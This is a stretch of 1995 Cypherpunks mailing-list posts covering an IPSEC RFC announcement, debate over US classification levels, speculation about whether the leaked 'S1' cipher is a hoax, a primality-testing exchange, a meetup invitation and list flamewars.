> definately did just a few years ago. 
                                                    _
Actually there is one other For Official Use Only (FOUO), not as bad a
penelty if these docs get out.


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 18:35:44 PDT
To: KALLISTE@delphi.com
Subject: Re: Only 1/3 of Government Computers Down So Far
In-Reply-To: <01HTVAYUCH6W90PB08@delphi.com>
Message-ID: <199508100134.VAA03975@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



KALLISTE@delphi.com writes:
> 	Many people are interested in cryptology because they don't
> want the NSA (among others) invading their privacy.

So, the question is this: do people want to follow the standard "ooh,
lets shudder at the conspiracy theories" track, and fall flat on their
faces, or do they want to see cryptography implemented and widely
deployed?

The noise levels on this list have driven most of the important crypto
types off it. People like Phil Karn and Steve Bellovin, who actually
implement stuff, aren't here any more. Instead, we have a vast flood
of ciphergroupies who love to post the latest funny bit they found on
the net, discuss whether David Koresh was being unfairly persecuted,
and how many bits of toe lint they found last week.

What we used to have was the cafe where the politically motivated
cryptographers hung out and gossiped. Now we have an open sewer in
which the occassional pearl still floats, and the cryptographers are
mostly gone.

Those of us who want to discuss cryptography here have been displaced.
If your goal is to impede communication about cryptography, you've
admirably succeeded. You've cut off one more place where people were
discussing how to deploy real-world solutions.

Tim May is wrong. I don't care what you call a "cypherpunk" -- thats
your business. However, the useful people *are* the people who write
code, spend long hours working to get standards implemented, work
lobbying in Congress, etc. Those of you who just rant, like Tim, were
very useful two years ago, but its getting rather thin listening to
you guys make it impossible to discuss real work while you blather.
(Sorry, Tim. However, as long as you are going to call me "abusive" I
might as well speak my mind. If you are going to do the time, might as
well do the crime.)

> The Foster story concerns the chief NSA privacy-invasion of modern
> times: spying on domestic banking transactions.  So it's relevant.

Actually, what you've been posting has been even below the standards
of journalistic integrity (i.e. few) that you find on a Pacifica radio
station.

I don't even care if all the conspiracies are real. Isn't what is out
in the open enough? If the invasions of privacy that the government
acknowledges and the crap like Clipper that they try to foist on us
isn't horrifying enough, what weak-assed conspiracy theory that
someone came up with while tripping is going to do it for you.
Reality is frightening enough. FINCEN is real. The NSA really spied on
people at least until the congressional hearings in the '70s. The
government really invades privacy every day. Why do I need crap?

> 	The Grand Inquisitor role is getting a little old.  So if
> you want to continue to play it, my response is:  Fuck Off.
> 
> -Orlin

Frankly, Orlin, I think you are, with respect to the goals we are
trying to advance here, a useless lump of flesh. I've spent about
$50,000 of my own money trying to make the internet safe for
root-eaters like yourself. I've spent months of my life struggling to
get RFCs out, and I'm spending most of this month locked in my
apartment writing code. Right now, we are coordinating an effort to
try to get get IPSEC widely implemented in the next several months and
deployed by spring. What do you do, exactly, other than generate chaff
to make it impossible for any real work to be seen on the radar?

When people bring up real work, like cryptographic libraries or Wei's
stuff or the work I've been doing in the IETF and that sort of thing
people like Matt Blaze notice, and maybe Ray Cromwell and Hal Finney
(cypherpunks both, not ciphergroupies) try to discuss things, but the
folks like you basically drown everything out by making more noise
about random conspiracy garbage.

Frankly, if anyone is helping the NSA, its you. They don't want to see
universally deployed crypto. You could be out trying to spread
cryptography by coding, by handing people crypto when they need it, or
any one of dozens of other things. Instead, what you are doing is
making it impossible for people to try to get work done.

I have no idea what you are like personally. Maybe you're a nice,
smart guy. Maybe you are really a useful person in your other life.
However, I don't think your posting more conspiracy tracts is
improving life as we know it.  You have become an impediment -- a lump
of rock in the highway. You aren't part of the solution -- you are
part of the problem.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 19:06:51 PDT
To: cypherpunks@toad.com
Subject: Re: This summer's special delivery?
In-Reply-To: <ac4eb0c9030210046e6c@[205.199.118.202]>
Message-ID: <199508100206.WAA08666@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> >Someone sent me (to my bell labs address) a copy of this this afternoon via
> >an anon server in the netherlands.

> I got a copy mailed to me directly as well. I don't know why he/she/it sent
> it me, but I got it.

Ditto for me. I haven't had time to examine it in detail yet, but...

My impuse is to assume its a hoax but examine it in detail. Anyone
have a Tessera card to test it against?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 19:14:34 PDT
To: cypherpunks@toad.com
Subject: IPSEC goes to RFC
Message-ID: <199508100214.WAA28860@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



RFCs 1825, 1826, 1827, 1828, and 1829 came out today.

These RFCs describe in detail the IPSEC protocol, which is designed to
secure the internet from the ground up. IPSEC permits the
cryptographic encapsulation of all your IP traffic, which means all
your internet communications.

IPSEC is now a Proposed Standard.

Please read them and help us in the effort to universally deploy this
protocol.

Still to come will be a key management system. The current notion is
to store RSA keys in the DNS -- a proposal to do this made by Eastlake
and Kaufman has been accepted by the IETF. Eastlake is now working on
a certificate format that will be an alternative to X.509. The keys
will be used by a modified version of the STS protocol (a signed
Diffie-Hellman exchange) that is being worked on by Phil Karn -- the
key management system is to be called "Photuris" and is currently an
internet draft.

Again, *we need your help*. Cypherpunks write code. Help us make the
internet safe for personal privacy by contributing to this effort.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Wed, 9 Aug 95 19:15:22 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting) (fwd)
Message-ID: <199508100215.WAA05968@acmex.gatech.edu>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
> On a fair number of occassions I have been told that federal type folks
> have made statements to the effect that there is no such thing as a "TOP
> SECRET" classification of US government docs. Since really secret things
> tend to get neither confirmed nor denied, I am inclined to believe this.
> Thus SECRET is the top classification in today's government/military. If
> anybody knows otherwise I would be interested in the information.
> 
> JWS
>  
In high school I was in JROTC and was put in charge of security for our
batallion. I read the army's guides to physical security. These books
were dated early 80's and late 70's, so the situation might have changed, 
but I doubt it. They denoted three information security clearance levels.
CLASSIFIED, SECRET, and TOP SECRET. If TOP SECRET doesn't exist now, it
definately did just a few years ago. 

-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Wed, 9 Aug 95 20:01:42 PDT
To: cypherpunks@toad.com
Subject: >actual< classification categories
Message-ID: <v02120d02ac4f2da4df4f@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


I have copies of declassified documents with the following markings:

        secret                 (1985)
        top secret             (1986)
        classified             (1984)
        confidential           (1985)
        eyes only              (1986)

Some have various combinations, such as:

        secret/sensitive
        top secret/sensitive
        eyes only/top secret/sensitive

This isn't a complete list, but it's better than idle speculation.

The vast majority of declassified paper documents that I've seen (not a
small number) have explicit statements regarding _who_ is allowed to see
it, _how_ they are allowed to move and/or distribute it, control #s and
copy #s, semicomprehensible strings of characters, and so on; many have
thiings like destruction instructions and expiry dates. More and more,
slight variations are being introduced into each version for purposes of
compartmentalization. It's conceivable that this is the source of the typo
Hal spotted, but I doubt it. The fact that specific instrux were relegated
to a separate "label file" seems very suspect; the fact that the warning
tag is tacked onto the end is maybe noteworthy--it's in a different format,
which is possibly odd, but it might've been put there for silly theatrical
purposes.
        Basically, "top secret" without further comment is James Bond
stuff, since in and of itself it doesn't tell those who need to know what
they need to know.
        My guess is that someone stuck the "top secret" stuff on the
beginning and end of something they found. But that doesn't make it a hoax,
necessarily.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 9 Aug 95 20:10:19 PDT
To: perry@piermont.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508100214.WAA28860@panix2.panix.com>
Message-ID: <199508100310.XAA11723@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry wrote:

| RFCs 1825, 1826, 1827, 1828, and 1829 came out today.
| 
| These RFCs describe in detail the IPSEC protocol, which is designed to
| secure the internet from the ground up. IPSEC permits the
| cryptographic encapsulation of all your IP traffic, which means all
| your internet communications.
| 
| IPSEC is now a Proposed Standard.

| Again, *we need your help*. Cypherpunks write code. Help us make the
| internet safe for personal privacy by contributing to this effort.

	How about posting a list of 'things that need doing?'  I
assume one is floating around, possibly even with time estimates?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 9 Aug 95 21:57:03 PDT
To: James Caldwell <jcaldwel@iquest.net>
Subject: Re: Classification levels (was: Re: "S1" encryption system (was: this looked like it might be interesting) (fwd))
In-Reply-To: <m0sgNPH-001gBTC@dorite1.iquest.net>
Message-ID: <Pine.3.89.9508092308.B21852-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Aug 1995, James Caldwell wrote:

> PHrEaK! wrote:
> > 
> > In high school I was in JROTC and was put in charge of security for our
> > batallion. I read the army's guides to physical security. These books
> > were dated early 80's and late 70's, so the situation might have changed, 
> > but I doubt it. They denoted three information security clearance levels.
> > CLASSIFIED, SECRET, and TOP SECRET. If TOP SECRET doesn't exist now, it
> > definately did just a few years ago. 
>                                                     _
> Actually there is one other For Official Use Only (FOUO), not as bad a
> penelty if these docs get out.
> 

I was in the USAF 1987-1990, Tenn ANG 1990-1.  Documents are classified 
to five levels:

EEFI:  Essential Elements of Friendly Information-- pieced together, 
documents containing EEFIs may compromise classified info.  Usually, 
documents containing EEFIs are classified FOUO, but it is not required.

FUOU:  Usually not considered damaging by themselves.  FUOU documents are 
not considered classified, per se.
CONFIDENTIAL:
SECRET:
TOP SECRET:  These three differ in a matter of degrees.  Secret/Top 
             Secret information may cost lives, or millions of $.

All TOP SECRET information is automatically given an SCI (Special 
Compartmentalized Information) Category, and placed on a NTK (Need To 
Know) only access.  Many of the SCI abbreviations are themselves 
classified TS.  (The only one I know is "Q"--Nuclear.)  Each time 
clearance is extended to a new SCI, a new security background check must 
be made.

If you have clearance Q, and you want to see the plans for the MX, you 
had better be able to demonstrate NTK (usually from orders).


And no--there is no way under the sun that TS is going to be removed any 
time soon.

Nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 9 Aug 95 22:01:42 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Prime Number Gen's.
In-Reply-To: <199508091413.KAA00112@clark.net>
Message-ID: <Pine.3.89.9508092321.C21852-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Aug 1995, Ray Cromwell wrote:

> Nathan Zook wrote:
> > > don't have a GNU ftp site to hand.
> > > 
> > > There's a function
> > > 
> > > 	int mpz_probab_prime_p(mpnum, SURETY)
> > > 
> > > which returns true if the prime passes SURETY probablistic prime tests.
> > > 
> > > I think if it passes say 25 tests, then there will be less than a
> > > 1/2^25 chance that it is not prime.
> > > 
> > > Also, on:
> > > 
> > > 	http://dcs.ex.ac.uk/~aba/rsa-keygen.html
> > > 
> > 
> > The proper thing to do is to then search for a number which demonstrates 
> > p is prime....
> 
>   And how do you do this? I'm not aware of any deterministic primality
> test which isn't atleast as hard as factoring. P-1 factorial is such
> a number which could demonstrate P is prime (compute the gcd, check if
> they are relatively prime). Good luck computing it.
>  
> -Ray

Common, Ray!  floor(sqrt(p))! would work fine....  ;-)  Seriously, at 
least 1/4 of the numbers between can p and 0 prove that p is prime.  So you 
try for a while.  If you don't get it, you can flip back.

I apologize for being so vague.  I don't have the paper I read a couple 
years ago in front of me.  You might contact your local math department & 
ask...

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 9 Aug 95 22:12:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <9508070918.AA19988@cs.umass.edu>
Message-ID: <Pine.3.89.9508100049.D21852-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 7 Aug 1995, Futplex wrote:

> No crypto/privacy relevance, delete or flame now....
> 
> Nathan writes:
> > This is why the "not a Turing machine" assertion that the "Professor" is 
> > important.  We know that Turing machine is undecidable, so if we want to 
> > limit behavior, we can't have one.  BUT---we don't know that being a 
> > Turing machine is equivalent to having "unpredictable" behavior.  
> > Furthermore, a "proof" of the "not a Turing machine" assertion is going 
> > to have to be done by--you guessed it--a computer.  And this computer is 
> > running a program which definitely IS a Turing machine, if it is capable 
> > of "proving" that other (suitably non-trivial) programs are not Turing 
> > machines.
> 
> I think this is a bit misguided. The Turing machine (TM) is an extremely general
> abstract model of computation. The gargantuan hunk of code that runs the 
> Space Shuttle can be viewed as a Turing machine, as can a "Hello world" program
> written in Visual BASIC. So, there's not really a question about whether or
> not we're talking about Turing machines (unless perhaps you want to discuss
> quantum theorem provers and QTMs :) 

If a statement is vacuous, it needs refining :-).  If I were to state 
that "Program X is not a Turing Machine", I would be stating that program 
X does not model all Turing machines throught its input.  It is the ability 
of some Turing machines to model all Turing machines through their input 
that makes them undecidable.


> Now, Rice's Theorem says that all non-trivial properties of TMs are undecidable.
> If I pick a "non-trivial" property, I can't conceivably build a TM ("write a
> program", if you like) that, upon input of the specification of an arbitrary TM,
> can tell whether or not that TM exhibits the property I picked. This does not
> mean that I can't decide whether some particular TMs have that property or not --
> I can. I just can't write down a procedure that handles the general case.

The problem here is that it is the interesting cases with which we are 
concerned.  If someone wants to write a computer program to "verify" my 
proof of the RSA algorithm, fine.  But I have to be convinced that there 
program does what they claim before I care.  And since their program 
takes mathematical theorems as input, it is already demonstrating 
near-Turing ( :-P) behavior.


> Also, this theorem clearly hinges on the meaning of "trivial". From what I've
> seen, a very strict interpretation is largely appropriate; nearly everything
> except the least exciting of trivial low-level properties of TMs seems to come
> out to be "non-trivial" in this regard. The proof of the theorem is more
> precise about this, naturally, but I've found this useful as a working
> colloquial definition.

I'll buy that.

> -Futplex    

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Wed, 9 Aug 95 21:48:01 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: "S1" encryption system
In-Reply-To: <199508092310.QAA11567@jobe.shell.portal.com>
Message-ID: <199508100443.EAA00611@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

BTW, I compiled it and confirmed that decryption is the inverse of
encryption for at least one (key, plaintext) pair..

> BTW I just was starting to look at the key scheduling and I noticed that
> fullkey is indexed in its 2nd slot by i*2 where i goes from 0 to 31, but
> is only declared as being 32 in size in that slot.  So I think this is
> another typo, probably the index should be i.  This kind of thing does
> not inspire confidence...

It looks very much like the sort of typo you would get from a
mistranslation from assembly language if the target architecture had a
*4-bit* processor. (This is also consistant with the "<<4"'s which
show up in several places in the code).

The typo is consistant -- it shows up every time the key schedule is
referenced; it looks like a semi-mechanical translation was done..

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMCmOdbT+rHlVUGpxAQFdNQP+I5lvR0itV0l2ypGF7EGGKrYcTnSNa0Fn
UqD7IIQ/BqViSeoXFHWzWJ5KUj9+y9RuKmwnMGGrlxRunZSDUya4VX0PZOX0bP4K
rbtu2j2H33cIrDPA+POvVYNAXBj3Sw1paIVf/07937oDZfdsqrn8c4rgXEeMgk4U
aoH4lpMfxY8=
=dd0O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 9 Aug 95 21:52:02 PDT
To: cypherpunks@toad.com
Subject: Hail South Florida Cypherpunks!!
Message-ID: <199508100449.AAA17358@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

[All the rest of ye can delete this message now, with my sincere apologies,
and return to the regularly scheduled flamewar. <Regarding just how hard it
is to actually hit the "delete" key when a message ye don't want appears,
as opposed to posting yet *another* message.>]

HEAR YE, HEAR YE,  the inaugural meeting of South Florida's Brew Crew O'
(Cypherpunks), is scheduled for Saturday, August 12 at Ye Olde Riverwalk
Brewery in Ft. Lauderdale.

Good ale, good discussion and good friends will hopefully be a highlight of
the fest.  And should the invited Dark Knights (cops) arrive [we're
expecting one] a lively jousting contest will ensue (the loser will be
ceremoniously placed in the C-punk stockade and force fed Clipper Chips).
Should Sen. Exon, the evil Sheriff of Congressham (or was that
Congresspork?) attend our noble round table, we will have a hanging in the
town square, preceded, of course by the traditional legume toss. [Beano,
anyone?]

There will be a short speech by my friend Ginger <Phiberflea@aol.com> who is
fresh back from Las Vegas-shire and the DefCon III convention.  She will
describe what it's like to be one of the few wenches at a conference full of
male hackers [guys, it looks like we're all in for some trouble!]...

If one of ye brings a PGP-infested notebook, there may even be a keysigning!
We can even discuss the recent "spooky" psoting to the list.

Anyway, _everyone_ is invited!  Peasants, squires, lords and ladies, jesters,
knights, and royalty, a chair and ale await ye all. Feel free to invite any
south-Floridians not on the list. No need to RSVP, (ye olde e-mail box is
full-to-overflowing already), just show up around 5:00 and have fun!

The Riverwalk Brewery isn't exactly Sir May's house, but here are the stats:

Riverwalk Brewery
111 SW 2nd Avenue
Ft. Lauderdale, FL 33301
(305) 764-8448

>From Miamishire:   I-95 North to Broward Blvd., Take Broward East (right) 2
miles to Moffat (just before RR tracks), Turn Right, second building on the
right.

>From Palm Beachshire:  I-95 South to Broward Blvd., Take Broward East (left)
2 miles to Moffat (just before RR tracks), Turn Right, second building on the
right.

Specialty Beers: - Marlin's Light, Blackbeard's Gold, and Riverwalk Red.

Dark Specials: - Offered on rotation: Panther's Porter, Swampwater Stout,
Black Marlin Oatmeal Stout, Ramsey's Imperial Stout.

Brewmaster's Special - changes monthly

Pints $3.00   /   10oz Mugs  $2.50
Happy Hour 4-7pm  Pints $2.50

Appetizers
Chicken Fingers, Wings, Spinach Dip, Calamari, [Mmmm...tentacles! :) ]
Italian Baked Ziti, Fried Mozzarella, Potato Skins. ($4.50-$5.95)

Soups & Salads 
Onion Soup, "Geek"/Caesar/Chef Salad, Souvlaki, Chicken Kebab ($3.50-$7.50)

Dinner (Sorry, Dragon meat is unavailable.)
New York Strip Steak, Grilled Twin Pork Chops, Shish Kebab,
Chicken Marsala, "Shaslik of Steer" ??? (whatever *that* is),
Grilled Sirloin Beef Tips, Grilled/Kebab Swordfish,
Grilled Mahi-Mahi [dolphin], Cajun Chicken Fettucini ($10.95-15.95)

Sandwiches & Burgers
Burger/Cheeseburger, Chicken/Mahi Mahi [dolphin] Sandwiches ($5.95-$6.95)

Dinners served 'till 11:00pm, Sandwiches served 'till 11:30pm,
Bar closes at 1:00am., party will [probably] end before that.

Ready your mounts and make haste!  Ging and I will arrive ~5:00pm to partake
of happy hour and fight back any invading hordes for a table. One of us 
(Ginger) may even be wearing a "munition," so watch out. I will wear my red
"Hillary" headband.

Hope to see you there!  :)
Ging. & Jim.
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCmKv21lp8bpvW01AQH0BAQAgZNgdkA/6zdMeHXdD1djYN2/yuw8th53
cftYhVxvdA65qMSAlgZPR2NN+2RC16LhAvLS3E3g2OuSRIpbI/V1OcvpcMG1/JvB
HTs1mxhsQrF8YwrUMhe4gOxftXryeR7lalmMBhfka2kpmeZNN2Cev52WQgr8ahWQ
NZ20pnfDhLY=
=dAdE
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCmPtioZzwIn1bdtAQFmTQF/SHKgZ/eKjEvBY4HBkDPKIMqpbiCP1agy
aFuGk5ly6YePLPHo2bEn0KWIvrqSrd9j
=f+JI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 9 Aug 95 21:54:06 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: NSA, NRO, and Keeping Secrets
In-Reply-To: <ac4682bd00021004c387@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950810004737.2605C-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Timothy C. May wrote:

> Date: Thu, 3 Aug 1995 13:49:35 -0700
> From: Timothy C. May <tcmay@sensemedia.net>
> To: Childers James <ic58@jove.acs.unt.edu>, Jim Ray <liberty@gate.net>
> Cc: cypherpunks@toad.com
> Subject: NSA, NRO, and Keeping Secrets
> 
> At 7:50 PM 8/3/95, Childers James wrote:
> 
> >I'm afraid I don't follow. Are you saying that the NSA is assuming a more
> >public role because (apparently) stong crypto is now widely available to
> >the public? I don't see the connection between A and B if this is what
> >you are claiming.
> >
> >Unless they're gearing up for a PR campaign... I wonder how the NSA has
> >been portrayed in Hollywood in the past. I've just seen them mentioned in
> >one movie I can think about ("Crimson Tide"). Anyone else know of references?
> 
> The NSA has been mentioned in many recent movies, even in television shows
> (like "The X Files"). I haven't been keeping a list, but the last Clancy
> movie, "A Clear and Present Danger," had references. And in more than one
> movie the reference to "NSA agents" doing various things is made.
> 
> The NSA has a high profile today. "No Such Agency" is clearly marked as an
> exit on the Baltimore-Washington highway, and of course even has a museum
> open to the public.
> 
> Even the National Reconnaissance Organization is public knowledge, partly
> because of the Burrows book "Deep Black," and partly because of the
> controversy over the huge building out near Dulles Airport.
> 
> Some things are mostly secret, though. The cover of Consular Operations was
> almost blown some years back by former agent Ludlum, but ConsOps has faded
> back into obscurity.

Then there are the e-systems like companies, operating in the U.S., often 
conducting operations under the guise of corporations yet ducking below 
the umbrella of "classified information" at the first sign of a suit.  
Yet, the employees walk about armed and turn up with bugging equipment in 
drug trafficker's neighborhoods.  e-systems is just the latest to be 
under public scrutiny.

Is it any wonder the government has begun to lean heavily on corporations 
where traditional institutional secrecy has been circumvented by FOIA and 
such?

Hell, e-systems is publically traded, dekalg has been talking about 
initial public offerings for months.

There is perhaps more protection in the corporation of former 
intelligence types than in any agency.

I commented before that NRO and NSA were public relations savvy now because 
most of the deeply hidden projects had found their way elsewhere.


> 
> --Tim May
> 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,
> tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
> 408-728-0152           | knowledge, reputations, information markets,
> Corralitos, CA         | black markets, collapse of governments.
> Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 9 Aug 95 23:19:09 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508100000.UAA07792@crypto.com>
Message-ID: <Pine.SUN.3.91.950810012027.18054B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Aug 1995, Matt Blaze wrote:

> I don't know what to believe.  If this is a real, classified cryptosystem,
> it would be a very unusual first.  On the other hand, if this is a hoax,
> whoever did it appears to have gone to some trouble, and has included some
> interesting design features.  A third possibility, if we are to believe
> the spook markings, is that it is a re-implementation of someone else's
> cryptosystem, created for the purpose of cryptanlysis.

Two other possibilities: (1) It's merely an independently produced 
cryptosystem disguised as a "leak" to save its creator the trouble of 
asking experts to analyze it for him/her.  (2) It's a misleading / 
intentionally "wrong" version of something, "leaked" by a government 
official of whatever ilk to precipitate a legal investigation of 
Cypherpunks, remailers, etc.  (ie to show a judge to get wiretaps, etc.)

I'm skeptical of (2), but it occured to me, and one can't be too safe...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 9 Aug 95 23:20:26 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <199508010141.AA02724@tyrell.net>
Message-ID: <Pine.SUN.3.91.950810012606.4442A-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Phil Fraering wrote:

> Date: Mon, 31 Jul 1995 20:41:37 -0500
> From: Phil Fraering <pgf@tyrell.net>
> To: stewarts@ix.netcom.com
> Cc: hoz@univel.telescan.com, cypherpunks@toad.com
> Subject: Sat phone permit "wire"taps
> 
> Bill, I also understood that the Walkers also leaked to the Soviets
> details on U.S. submarine sonar operating procedures.
> 
> _Anyway_, my point was, if they can't keep _that_ secret, I doubt
> they'd be able to keep secret the details/keys for activating the
> backdoor on whatever artificially weakened system they're forced to
> use (if they are).
> 
> Phil
> 

What the walkers really gave over was the ability to decode U.S. Naval 
and some diplomatic ciphers through the surrender of codebooks, 
procedures, keycards and repair manuals for the crypto hardware.  The 
resulting traffic and crypto analysis was backbreaking- and valuable 
enough to make Walker Sr. the best paid spy to that date in the Soviet 
scheme of things.

Sov's discovered their traffic was being read on the Ivy line by 
listening to naval and diplomatic communication referencing it directly- 
and a little bit of selective transmission to confirm the source of 
intelligence.  (The U.S. played a similar trick on the Japanese to verify 
Midway as their target in the Pacific- they were reading Purple and the 
JN-12 and JN series flawlessly at the time)

Sov's discovered their subs were being tracked with amazing ease by 
listening to U.S. Naval anti-sub communications and reports.  The 
result:  Directed attention to the noise emmisions of their sub fleet, 
something they might have overlooked for years otherwise.

The grand result:  Among others: Stronger Soviet Encryption, and the 
purchase from Japan of high precision milling equipment which allowed the
Sov's to produce perfected and hyper quiet propellers for their subs- they
jumped 10 years in technology in 12 months.

The most damaging and most coveted espionage information is cryptanalysis.

Period.

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Thu, 10 Aug 95 00:38:13 PDT
To: cypherpunks@toad.com
Subject: PGPFOne article in MacWeek URL
Message-ID: <v02120d01ac4f75aa40ff@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


MacWeek News

Aug 7, Vol 9 No 31

"PGPFone locks down phone conversations," by Robert Hess

<http://www.zdnet.com/~macweek/mw_08-07-95/news3.html>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Thu, 10 Aug 95 02:03:29 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: "S-1" key schedule
In-Reply-To: <199508100853.EAA13204@crypto.com>
Message-ID: <Pine.SOL.3.91.950810035659.17530A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Matt Blaze wrote:

> My money still says the "TOP SECRET" markings and other clues that
> suggest that "S-1" has something to do with Skipjack are a hoax.

Has anyone checked to see if this is just an older but obscure published 
algorithm? If it uses an 80-bit key, that tells me it's not too old, but 
I'm new to this stuff.

If it is a new algorithm, is it just a variant, or something completely 
new? 

[Sorry in advance if this is noise...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 10 Aug 95 01:45:34 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <Pine.SUN.3.91.950810012027.18054B-100000@rwd.goucher.edu>
Message-ID: <199508100845.EAA18756@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jon writes:
> Two other possibilities: (1) It's merely an independently produced 
> cryptosystem disguised as a "leak" to save its creator the trouble of 
> asking experts to analyze it for him/her.  

It strikes me as rather foolish to mail off anonymous copies to several
individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
